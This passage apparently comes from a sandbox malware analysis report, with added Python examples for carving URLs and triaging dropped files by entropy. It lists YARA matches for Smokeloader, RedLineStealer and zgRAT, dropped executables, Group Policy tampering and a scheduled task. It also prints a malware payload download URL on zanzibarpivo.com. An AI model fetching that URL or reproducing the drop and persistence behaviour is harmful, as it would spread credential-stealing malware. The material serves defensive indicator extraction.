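The rows above are raw string hits on process memory, so the same download URL appears several times with carving artefacts: trailing bytes such as `k`, `t`, `xe`, `8` and `J`, one hit that runs straight into a second file name (`.exe4ba5b…exe`), one truncated copy (`…8124p`), and one variant with an explicit `:80` port on an `https://` scheme. Before such strings are used as indicators they need to be normalised and deduplicated. The following Python is an added example and not code from Joe Sandbox or from the sample; it carves URLs from a constructed buffer that imitates the dump fragments (ASCII and UTF-16LE at both byte alignments), cuts trailing junk after a payload extension (an assumed heuristic), and flags scheme/port mismatches as separate indicators.

```python
import re
from urllib.parse import urlsplit

# Constructed stand-in for a process memory dump (not the sandbox's .sdmp data).
# It reproduces the forms seen in the report: NUL-terminated ASCII copies, a copy
# whose terminator was overwritten so it runs into the next string, one copy with
# an explicit :80 port, a truncated copy, and one UTF-16LE copy.
SAMPLE_DUMP = (
    b"\x00\x00https://zanzibarpivo.com/\x00"
    b"https://zanzibarpivo.com/7725eaa6592c80f8124e769b4e8a07f7.exek\x00"
    b"https://zanzibarpivo.com/7725eaa6592c80f8124e769b4e8a07f7.exe4ba5b01423b1af8ec10ab5719d97.exe\x00"
    b"https://zanzibarpivo.com:80/7725eaa6592c80f8124e769b4e8a07f7.exeJ\x00"
    b"https://zanzibarpivo.com/7725eaa6592c80f8124p\x00"
    + "https://zanzibarpivo.com/7725eaa6592c80f8124e769b4e8a07f7.exe".encode("utf-16-le")
    + b"\x00\x00"
)

URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+(?::\d{1,5})?(?:/[A-Za-z0-9._~%/-]*)?")
# Assumption: a payload extension followed by more characters means the string
# ran into adjacent memory; everything after the extension is dropped.
PAYLOAD_EXTS = (".exe", ".dll", ".zip")


def truncate_after_ext(url):
    """Cut carving residue that follows a payload extension."""
    low = url.lower()
    cuts = [low.index(e) + len(e) for e in PAYLOAD_EXTS if e in low]
    return url[:min(cuts)] if cuts else url


def extract_urls(dump):
    """Carve URLs out of raw memory bytes, in ASCII and in UTF-16LE at both
    byte alignments, normalise the carving artefacts and flag scheme/port
    mismatches. Returns sorted URLs, hosts and anomaly strings."""
    views = (
        dump.decode("latin-1"),
        dump.decode("utf-16-le", errors="ignore"),
        dump[1:].decode("utf-16-le", errors="ignore"),
    )
    found = set()
    for text in views:
        for m in URL_RE.finditer(text):
            found.add(truncate_after_ext(m.group(0)))
    anomalies = []
    for u in sorted(found):
        parts = urlsplit(u)
        if (parts.scheme, parts.port) in (("https", 80), ("http", 443)):
            anomalies.append(f"{u}: {parts.scheme} scheme with explicit port {parts.port}")
    hosts = sorted({urlsplit(u).hostname for u in found})
    return {"urls": sorted(found), "hosts": hosts, "anomalies": anomalies}


if __name__ == "__main__":
    for key, value in extract_urls(SAMPLE_DUMP).items():
        print(key, value)
```

Run against a real dump, the `hosts` list is what goes on a blocklist, the `urls` list is what goes in the IOC set, and the `anomalies` list records the `https://…:80/` variant separately so it is neither silently merged with the `https://` form nor lost.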

E-Banking Fraud

Source: Yara match | File source: 36.1.0FR80IiNvxJZyXnpOgiDlYNV.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 32.1.PA8JWMmRYiQsN7iqTjOvjsbW.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 33.1.zUOgRazdYnb35XHU4UIsV9Yc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 43.1.OYqxk9G3x4R05N4I0KLZXbXg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 38.1.68bEfZA6FBu6lC5BaADYSIdx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000024.00000001.2063500056.0000000000843000.00000040.00000001.01000000.0000001B.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000001.1883456337.0000000000843000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000001.1945506899.0000000000843000.00000040.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match | File source: 0000002B.00000001.1972234564.0000000000843000.00000040.00000001.01000000.00000022.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000001.2017532049.0000000000843000.00000040.00000001.01000000.0000001D.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PA8JWMmRYiQsN7iqTjOvjsbW.exe PID: 8176, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: zUOgRazdYnb35XHU4UIsV9Yc.exe PID: 7204, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 0FR80IiNvxJZyXnpOgiDlYNV.exe PID: 4252, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\V4R2L1ofXzAhB4UFI0Rj2LED.exe entropy: 7.99150344378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe entropy: 7.99150344378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\F9a5CAWDzjn4KX6pZMk93eNG.exe entropy: 7.99614337359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\OFQ7ZJkbPO93pwjUuJw87q34.exe entropy: 7.99150344378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\QV2CtvThMWBnTkQtNtmINgo7.exe entropy: 7.99150344378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\XqzL1fMvCxCCFKp0SSzKRmTk.exe entropy: 7.99150344378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\bfxtyeVJT5bBfIUy0v6XVgPU.exe entropy: 7.99150344378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\8FauF1Ec16N4pbn45vApMB9Y.exe entropy: 7.99150344378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\H9xPrDydeyqRWbh69y5tSjbf.exe entropy: 7.99150344378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exe entropy: 7.99150344378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe entropy: 7.99614337359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\75ML2QNSkdxIefrPkvr0UjCi.exe entropy: 7.99150344378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\4atMces8tYoo96OnbLT8HE6O.exe entropy: 7.99150344378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\NdBfL9GQKAuQALK03ZlcLnBv.exe entropy: 7.99614337359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\f1yTeHrlUuYsPLKRUrl6KMpe.exe entropy: 7.99150344378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\fkwQUocr72Hw75SyPBzpetnQ.exe entropy: 7.99614337359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\wv3L00mTLTTnOX1S2obszDcX.exe entropy: 7.99150344378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\QFdxqcJJKBnNvVH34NTBZO9k.exe entropy: 7.99150344378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\4H9gwSn9hsmr1uT7Ln1OMxxi.exe entropy: 7.99150344378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\s2d02ZEHUbxI410yPzvUYGTP.exe entropy: 7.99150344378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\Pb9nMKWmPyxCQFZJxeJuCUeo.exe entropy: 7.99150344378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\pHBfSuis1Xhkv6ZdHJOyObLb.exe entropy: 7.99150344378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\ShiCqBALVwHXuLXc8u9Hf2su.exe entropy: 7.99150344378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\MLHy8CHCXXPjzOh2OJFrG13g.exe entropy: 7.99150344378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\zFZkiprzkq8Ae7mkklwscu5a.exe entropy: 7.99150344378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\r0DfbOvsdOtWhxCPYUgwqjYI.exe entropy: 7.99150344378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\t5dER7PVcN8YbrHzsawB4xKm.exe entropy: 7.99150344378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\7ajn4zo6v0GdgVSDv67pQ6UA.exe entropy: 7.99150344378
Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\060[1].exe entropy: 7.99823692801
Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\Documents\SimpleAdobe\Zsk2cFkeBC4UsceqkHvvw1iU.exe entropy: 7.99823692801
Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\setup[1].exe entropy: 7.99613628014
Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\Documents\SimpleAdobe\0bDSNbGYZjXnI1v06off3DYe.exe entropy: 7.99613628014
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe | File created: C:\Users\user\AppData\Local\Temp\ff086fda entropy: 7.99714560633
Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe | File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404232137541\opera_package entropy: 7.99999212861
Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\Opera_109.0.5097.59_Autoupdate_x64[2].exe entropy: 7.99999212861
Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe | File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404232138021\opera_package entropy: 7.99998944371
Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\Opera_109.0.5097.59_Autoupdate_x64[4].exe entropy: 7.99998944429
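Two things in the rows above are worth reproducing on one's own machine. First, the entropy value 7.99150344378 recurs for more than twenty drops with different random names under AppData\Local and Pictures; identical entropy at that precision almost always means byte-identical content, which a hash confirms and which collapses the list to a handful of distinct payloads. Second, an entropy near 8.0 says only that the bytes are compressed or encrypted, not that they are malicious: the Opera autoupdate packages in the same list score 7.99999, higher than any of the stealer drops, because they are compressed installer archives. The Python below is an added example, not Joe Sandbox's code or the sample's; the file contents are constructed in the script (a SHA-256 chain standing in for a packed payload and a text file for contrast), the paths are two of the report's drop paths plus one made-up name, and the 7.2 cut-off is an assumed triage heuristic rather than a sandbox setting.

```python
import hashlib
import math
from collections import Counter

# Assumption: a common triage cut-off, not a Joe Sandbox setting. Compressed
# or encrypted data sits near 8.0; plain native code is usually around 6.
PACKED_THRESHOLD = 7.2


def shannon_entropy(data):
    """Bits per byte of `data`: 0.0 for a constant buffer, 8.0 for uniform."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def prng_bytes(n, seed=b"constructed sample"):
    """Deterministic high-entropy filler (SHA-256 chain) standing in for a
    packed payload; it is not real packer output."""
    out, h = bytearray(), seed
    while len(out) < n:
        h = hashlib.sha256(h).digest()
        out += h
    return bytes(out[:n])


def triage_drops(files):
    """files: {path: bytes}. Returns the entropy verdict per file and groups
    of byte-identical drops (what a repeated entropy value usually means)."""
    report, by_hash = {}, {}
    for path, data in files.items():
        ent = shannon_entropy(data)
        digest = hashlib.sha256(data).hexdigest()
        report[path] = {
            "entropy": round(ent, 5),
            "sha256": digest,
            "packed_or_encrypted": ent >= PACKED_THRESHOLD,
        }
        by_hash.setdefault(digest, []).append(path)
    duplicates = {h: sorted(p) for h, p in by_hash.items() if len(p) > 1}
    return {"files": report, "duplicate_groups": duplicates}


# Constructed inputs under two of the report's drop paths plus a text file;
# none of these are the real dropped files.
SAMPLE_FILES = {
    r"C:\Users\user\AppData\Local\V4R2L1ofXzAhB4UFI0Rj2LED.exe": prng_bytes(65536),
    r"C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe": prng_bytes(65536),
    r"C:\Users\user\Pictures\notes.txt": b"The quick brown fox jumps over the lazy dog. " * 500,
}

if __name__ == "__main__":
    result = triage_drops(SAMPLE_FILES)
    for path, info in result["files"].items():
        print(f"{info['entropy']:.5f}  packed={info['packed_or_encrypted']}  {path}")
    for digest, paths in result["duplicate_groups"].items():
        print(f"identical content {digest[:16]}...: {len(paths)} files")
```

On a real triage the dictionary is filled from the dropped-file directory, the duplicate groups tell you how many distinct payloads actually need unpacking, and the entropy flag is only a prompt to look at signatures, section layout and behaviour, which is what separates the stealer drops from the Opera packages here.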

System Summary

Source: 00000015.00000002.1918521862.00000000041C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000029.00000002.2099601729.00000000041B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000013.00000002.1917490394.000000000418C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000027.00000002.2175970589.000000000418C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000022.00000002.2122134547.00000000043D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000029.00000002.2100222351.00000000043EC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000B.00000002.2255300318.000000000411C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.2259248364.00000000040CC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000027.00000002.2184889083.0000000004440000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000001D.00000002.1939799886.000000000439C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000022.00000002.2121373428.00000000040CC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001D.00000002.1938329589.0000000004300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000001B.00000002.1937757105.000000000408C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000015.00000002.1930196904.000000000434C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.2279821604.0000000005BD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000001B.00000002.1940278884.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exe, type: DROPPED | Matched rule: Detects zgRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe | Code function: 24_2_0040EA54 NtQuerySystemInformation
Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Windows\System32\GroupPolicy\gpt.ini
Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Windows\System32\GroupPolicy\Machine
Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Windows\System32\GroupPolicy\User
Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Windows\System32\GroupPolicy\Machine\Registry.pol
Source: C:\Windows\SysWOW64\schtasks.exe | File created: C:\Windows\Tasks\bWycNackLSywaqkmgR.job
Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe | File created: C:\Windows\system32\GroupPolicy\Adm
Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches
Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe | File created: C:\Windows\SysWOW64\GroupPolicy\gpt.ini
Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe | File deleted: C:\Windows\SysWOW64\GroupPolicytcUHV
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6385EEA40
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6385F0AE0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6385DB020
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6385FD210
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6385F17B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6385D5950
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6385E19D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6385D8AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6385DFBA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6385F2BF0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6385D4CA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6385F4D50
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6385C9FF0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6385F00A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6386EC080
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6385E1112
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6385E22B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6385EB320
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6385F6360
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6385F58E0
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Code function: 4_2_0041B84B
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Code function: 4_2_0040BA80
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Code function: 4_2_0040C2AC
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Code function: 4_2_004123A0
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Code function: 4_2_0040F441
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Code function: 4_2_0040BD2A
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Code function: 4_2_0042153C
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Code function: 4_2_0040C6A0
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Code function: 4_2_00408761
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Code function: 4_2_0041BF69
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Code function: 4_2_0040B70E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Code function: 4_2_0040BFF1
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: 11_2_0041B84B
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: 11_2_0040BA80
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: 11_2_0040C2AC
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: 11_2_004123A0
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: 11_2_0040F441
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: 11_2_0040BD2A
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: 11_2_0042153C
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: 11_2_0040C6A0
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: 11_2_00408761
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: 11_2_0041BF69
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: 11_2_0040B70E
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: 11_2_0040BFF1
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: 11_2_05BBC513
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: 11_2_05BBBCE7
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: 11_2_05BBBF91
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: 11_2_05BBF6A8
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: 11_2_05BC2607
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: 11_2_05BB89C8
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: 11_2_05BBC907
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: 11_2_05BBB975
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: 11_2_05BCBAB2
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Code function: 11_2_05BBC258
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: 19_2_0041B84B
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: 19_2_0040BA80
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: 19_2_0040C2AC
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: 19_2_004123A0
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: 19_2_0040F441
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: 19_2_0040BD2A
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: 19_2_0042153C
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: 19_2_0040C6A0
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: 19_2_00408761
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: 19_2_0041BF69
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: 19_2_0040B70E
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: 19_2_0040BFF1
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: 19_2_05CEC513
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: 19_2_05CEBCE7
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: 19_2_05CEBF91
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: 19_2_05CEF6A8
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: 19_2_05CF2607
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: 19_2_05CE89C8
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: 19_2_05CEB975
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: 19_2_05CEC907
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: 19_2_05CFBAB2
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Code function: 19_2_05CEC258
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: 21_2_0041B84B
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: 21_2_0040BA80
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: 21_2_0040C2AC
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: 21_2_004123A0
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: 21_2_0040F441
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: 21_2_0040BD2A
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: 21_2_0042153C
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: 21_2_0040C6A0
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: 21_2_00408761
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: 21_2_0041BF69
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: 21_2_0040B70E
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: 21_2_0040BFF1
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: 21_2_041CBCE7
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: 21_2_041CC513
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: 21_2_041D2607
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: 21_2_041CF6A8
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: 21_2_041CBF91
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: 21_2_041CC907
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: 21_2_041CB975
